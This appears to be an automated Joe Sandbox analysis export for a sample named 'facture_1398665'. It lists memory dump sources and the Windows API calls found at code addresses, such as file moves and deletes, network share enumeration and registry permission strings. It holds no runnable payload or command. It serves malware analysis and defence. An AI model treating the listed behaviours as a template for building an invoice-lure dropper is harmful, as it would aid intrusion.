    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 004AE82E
    • DeleteFileW.KERNEL32(00000000,00000000,00000020), ref: 004AE83C
    • MoveFileW.KERNEL32(00000000,00000000), ref: 004AE85F
      • Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,0040DD01,004D94A0,00000000,004D957C,?,00000000,004D959E), ref: 00406F87
    • SetCurrentDirectoryW.KERNEL32(?,00000105,?,?,?,0040DD01,004D94A0,00000000,004D957C,?,00000000,004D959E), ref: 00406F8D
    • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,0040DD01,004D94A0,00000000,004D957C,?,00000000,004D959E), ref: 00406F9C
    • SetCurrentDirectoryW.KERNEL32(?,00000105,?,?,?,0040DD01,004D94A0,00000000,004D957C,?,00000000,004D959E), ref: 00406FAD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00503F6C,004B1F3E,004B2358,004B1E94,00000000,00000B06,00000000,00000000), ref: 004809F1
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • InterlockedExchange.KERNEL32(0050B1B0,00000001), ref: 00480A08
    • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000), ref: 00480A1C
      • Part of subcall function 00480944: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,00480A2C,00000004,00503F6C,004B1F3E,004B2358,004B1E94,00000000,00000B06,00000000,00000000), ref: 0048095A
      • Part of subcall function 00480944: InterlockedExchange.KERNEL32(0050B1A8,00000001), ref: 00480971
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • VariantInit.OLEAUT32(?), ref: 0041D597
    • VariantInit.OLEAUT32(?), ref: 0041D63E
      • Part of subcall function 0041EE80: EnterCriticalSection.KERNEL32(0050AE44,?,?,?,?,?,0041691B,?,?,?,0041694E,00416956), ref: 0041EEB6
      • Part of subcall function 0041EE80: LeaveCriticalSection.KERNEL32(0050AE44,0041EF2F,?,0050AE44,?,?,?,?,?,0041691B,?,?,?,0041694E,00416956), ref: 0041EF22
    • VariantInit.OLEAUT32(?), ref: 0041D71B
    • VariantInit.OLEAUT32(?), ref: 0041D7D0
    • VariantInit.OLEAUT32(?), ref: 0041D875
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • VariantInit.OLEAUT32(?), ref: 0041C04C
    • VariantInit.OLEAUT32(?), ref: 0041C0C2
      • Part of subcall function 0041EE80: EnterCriticalSection.KERNEL32(0050AE44,?,?,?,?,?,0041691B,?,?,?,0041694E,00416956), ref: 0041EEB6
      • Part of subcall function 0041EE80: LeaveCriticalSection.KERNEL32(0050AE44,0041EF2F,?,0050AE44,?,?,?,?,?,0041691B,?,?,?,0041694E,00416956), ref: 0041EF22
    • VariantInit.OLEAUT32(?), ref: 0041C162
    • VariantInit.OLEAUT32(?), ref: 0041C1FE
    • VariantInit.OLEAUT32(?), ref: 0041C2B1
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • MulDiv.KERNEL32(00000000,?,00000000), ref: 00472DC7
      • Part of subcall function 0045AB18: MulDiv.KERNEL32(?), ref: 0045AB2D
      • Part of subcall function 0045AB18: MulDiv.KERNEL32(?), ref: 0045AB4A
      • Part of subcall function 0045AB18: MulDiv.KERNEL32(?), ref: 0045AB67
      • Part of subcall function 0045AB18: MulDiv.KERNEL32(?), ref: 0045AB84
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00472E56
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00472E85
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00472EB4
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00472ED7
      • Part of subcall function 00472204: MulDiv.KERNEL32(?,00000001,00000001), ref: 00472261
      • Part of subcall function 00472204: MulDiv.KERNEL32(?,00000001,00000001), ref: 00472281
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00431E8C: FillRect.USER32(?,?,00000000), ref: 00431EB5
    • CreateRectRgn.GDI32(?,?,?,?), ref: 0046A11C
    • SelectObject.GDI32(00000000,?), ref: 0046A137
      • Part of subcall function 0043170C: CreateBrushIndirect.GDI32(?), ref: 004317B7
    • FrameRgn.GDI32(00000000,?,00000000,00000001,00000001), ref: 0046A189
      • Part of subcall function 00432260: DrawTextExW.USER32(?,00000000,00000000,?,?,00000000), ref: 004322E3
    • SelectObject.GDI32(00000000,?), ref: 0046A2C9
    • DeleteObject.GDI32(?), ref: 0046A2D2
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • BeginPaint.USER32(00000000,?), ref: 00460EE7
    • SaveDC.GDI32(00000000), ref: 00460F20
    • ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 00460FA2
    • RestoreDC.GDI32(00000000,?), ref: 00460FD8
      • Part of subcall function 00461058: RectVisible.GDI32(?,?), ref: 00461170
      • Part of subcall function 00461058: SaveDC.GDI32(?), ref: 00461193
      • Part of subcall function 00461058: IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004611D3
      • Part of subcall function 00461058: RestoreDC.GDI32(?,00460FF2), ref: 004611FF
      • Part of subcall function 00461058: CreateSolidBrush.GDI32(00000000), ref: 004612A8
      • Part of subcall function 00461058: FrameRect.USER32(?,?,?), ref: 004612D6
      • Part of subcall function 00461058: DeleteObject.GDI32(00000000), ref: 004612DC
      • Part of subcall function 00461058: CreateSolidBrush.GDI32(00000000), ref: 004612EC
      • Part of subcall function 00461058: FrameRect.USER32(?,?,?), ref: 0046131A
      • Part of subcall function 00461058: DeleteObject.GDI32(00000000), ref: 00461320
    • EndPaint.USER32(00000000,?), ref: 00461015
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00480EA4: GetTickCount.KERNEL32(00000004,00000000,004D5709,00000000,004D5828,?,?,0050BE1C,00000000), ref: 00480EAA
      • Part of subcall function 00480C94: MoveFileExW.KERNEL32(00000000,00000000,00000001), ref: 00480CCA
      • Part of subcall function 00480C94: DeleteFileW.KERNEL32(00000000,00000000,00480D3B,?,?,?,?,00000000), ref: 00480CF1
      • Part of subcall function 00480C94: GetLastError.KERNEL32(00000000,00000000,00480D3B,?,?,?,?,00000000), ref: 00480D00
      • Part of subcall function 00480C94: MoveFileW.KERNEL32(00000000,00000000), ref: 00480D1A
    • GetLastError.KERNEL32(00000000,004D5828,?,?,0050BE1C,00000000), ref: 004D571E
      • Part of subcall function 00480E88: Sleep.KERNEL32(00000000,00000003,00000000,004D573C,;fM,00000000,00000000,00000000,,013EBA8C,,0050BE00,00000002,00000001,00000005,00000000), ref: 00480E9A
      • Part of subcall function 0048087C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • EnumWindows.USER32(0047B090,00000000), ref: 0047B1BB
    • ShowWindow.USER32(?,00000000), ref: 0047B1F2
    • ShowOwnedPopups.USER32(00000000,?), ref: 0047B221
    • ShowWindow.USER32(?,00000005), ref: 0047B289
    • ShowOwnedPopups.USER32(00000000,?), ref: 0047B2B8
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471AE6
    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471B17
    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471B48
    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471B79
      • Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA
    • FlatSB_SetScrollProp.COMCTL32(00000000,?,00000000,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471BA7
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00437B74: IsWindow.USER32(?), ref: 00437B91
      • Part of subcall function 00437B74: FindWindowExW.USER32(00000000,00000000,OleMainThreadWndClass,00000000), ref: 00437BC2
      • Part of subcall function 00437B74: GetWindowThreadProcessId.USER32(?,00000000), ref: 00437BFB
      • Part of subcall function 00437B74: GetCurrentThreadId.KERNEL32(?,?,00000000,00437C5E), ref: 00437C02
    • MsgWaitForMultipleObjectsEx.USER32(?,?,?,000000BF,?), ref: 00437C76
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00437C91
    • TranslateMessage.USER32(?), ref: 00437C9E
    • DispatchMessageW.USER32(?), ref: 00437CA7
    • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,00000000), ref: 00437CD3
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004B8EF8: SetLastError.KERNEL32(00000057,00000000,004B8FC3,?,?,?,00000000), ref: 004B8F62
      • Part of subcall function 004B8EF8: SetLastError.KERNEL32(00000000,00000002,?,?,?,004B9064,?,00000000,004B8FC3,?,?,?,00000000), ref: 004B8FA1
    • GetLastError.KERNEL32(0050BE1C,00000000,00000000,004D3107,?,?,0050BE1C,00000000), ref: 004D30C0
    • GetLastError.KERNEL32(0050BE1C,00000000,00000000,004D3107,?,?,0050BE1C,00000000), ref: 004D30D6
    Strings
    • Could not set permissions on the registry key because it currently does not exist., xrefs: 004D30CA
    • Setting permissions on registry key: %s\%s, xrefs: 004D307A
    • Failed to set permissions on registry key (%d)., xrefs: 004D30E7
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0044E388: CreatePopupMenu.USER32 ref: 0044E3A6
      • Part of subcall function 0044E388: CreateMenu.USER32 ref: 0044E3B3
    • GetMenuItemCount.USER32(00000000), ref: 0044E28C
    • GetMenuState.USER32(00000000,-00000001,00000400), ref: 0044E2AD
    • RemoveMenu.USER32(00000000,-00000001,00000400), ref: 0044E2C4
    • GetMenuItemCount.USER32(00000000), ref: 0044E2F4
    • DestroyMenu.USER32(?), ref: 0044E304
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00433044: CreateCompatibleDC.GDI32(00000000), ref: 0043305D
      • Part of subcall function 00433044: SelectObject.GDI32(00000000,00000000), ref: 00433066
      • Part of subcall function 00433044: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 0043307A
      • Part of subcall function 00433044: SelectObject.GDI32(00000000,00000000), ref: 00433086
      • Part of subcall function 00433044: DeleteDC.GDI32(00000000), ref: 0043308C
      • Part of subcall function 00433044: CreatePalette.GDI32 ref: 004330D3
    • GetDC.USER32(00000000), ref: 00435C9A
    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00435CAF
    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00435CB9
    • CreateHalftonePalette.GDI32(00000000), ref: 00435CDD
    • ReleaseDC.USER32(00000000,00000000), ref: 00435CE8
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 00432FC4
    • GetDeviceCaps.GDI32(?,00000068), ref: 00432FE0
    • GetPaletteEntries.GDI32(870801FD,00000000,00000008,?), ref: 00432FF8
    • GetPaletteEntries.GDI32(870801FD,00000008,00000008,?), ref: 00433010
    • ReleaseDC.USER32(00000000,?), ref: 0043302C
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetThreadLocale.KERNEL32(?,00000000,004112E3,?,?,00000000), ref: 00411264
      • Part of subcall function 00410FC0: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00410FDE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,004112E3,?,?,00000000), ref: 00411294
    • EnumCalendarInfoW.KERNEL32(Function_00011198,00000000,00000000,00000004,00000000,004112E3,?,?,00000000), ref: 0041129F
    • GetThreadLocale.KERNEL32(00000000,00000003,Function_00011198,00000000,00000000,00000004,00000000,004112E3,?,?,00000000), ref: 004112BD
    • EnumCalendarInfoW.KERNEL32(Function_000111D4,00000000,00000000,00000003,Function_00011198,00000000,00000000,00000004,00000000,004112E3,?,?,00000000), ref: 004112C8
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • UnhookWindowsHookEx.USER32(00000000), ref: 0047A623
    • SetEvent.KERNEL32(00000000,0047D5B6,00000000,0047C13F,?,01484140,?,01484141,0047C345,?,?,?,?,01484140), ref: 0047A63E
    • GetCurrentThreadId.KERNEL32(00000000,0047D5B6,00000000,0047C13F,?,01484140,?,01484141,0047C345,?,?,?,?,01484140), ref: 0047A643
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0047A658
    • CloseHandle.KERNEL32(00000000), ref: 0047A663
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • MessageBoxA.USER32(00000000,?,00401548,00002010), ref: 00402DA1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • WNetGetUniversalNameW.MPR(00000000,00000001,?,00000400), ref: 0040D8C0
    • WNetOpenEnumW.MPR(00000001,00000001,00000000,00000000,?), ref: 0040D9C6
    • WNetEnumResourceW.MPR(?,FFFFFFFF,?,?), ref: 0040DA1E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetThreadLocale.KERNEL32(?,00000000,00411533,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041133B
      • Part of subcall function 00410FC0: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00410FDE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0045BFE9
    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0045C0DD
    • MapWindowPoints.USER32(00000000,00000000,?,00000001), ref: 0045C126
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
